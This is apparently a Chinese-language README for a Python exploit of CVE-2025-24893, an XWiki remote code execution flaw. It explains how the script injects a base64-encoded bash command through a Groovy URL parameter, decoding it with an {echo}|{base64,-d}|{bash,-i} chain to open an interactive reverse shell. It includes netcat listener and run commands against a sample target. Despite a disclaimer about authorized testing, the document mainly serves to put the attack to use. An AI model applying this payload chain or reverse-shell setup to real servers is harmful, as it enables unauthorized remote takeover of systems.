免责声明: 此脚本仅用于教育目的和授权的安全测试。请勿在您不拥有或未经明确许可的系统上使用。滥用可能导致非法和危险后果。
该 Python 脚本利用 CVE-2025-24893,这是一个影响 XWiki 版本直至 15.10.10 的远程代码执行漏洞。
此版本扩展了 Al Baradi Joy 的原始 PoC,以生成一个反向 Shell。原始 PoC 可在此处找到。
XWiki 通过 URL 参数执行 Groovy 代码。
利用脚本将 bash -c 命令注入到该 Groovy 模板中。
正常的反向 Shell 包含多个引号(' 和 "),这会破坏 Groovy 的求值以及 URL。
为解决此问题,脚本将单行 Shell 命令以 Base64 编码。
然后有效载荷通过 URL 发送,并使用以下链执行:
{echo,<base64>} | {base64,-d} | {bash,-i}
这会安全地解码 Base64 有效载荷并使用 bash -i 执行,从而提供一个交互式反向 Shell。
http://<目标主机>//xwiki 路径(脚本会自动追加)示例:
# 正确
http://10.129.95.114:8080
http://example.com:8080
# 错误
http://10.129.95.114:8080/ # 末尾有斜杠
http://example.com/xwiki # 包含 /xwiki
在运行利用之前,您必须启动一个监听器来接收反向 Shell。
使用 Netcat 的示例:
nc -lvnp <lport>
<lport> 应与您提供给脚本的参数端口匹配。python3 cve-2025-24893.py <目标基础URL> <本地主机IP> <本地端口>
示例:
python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444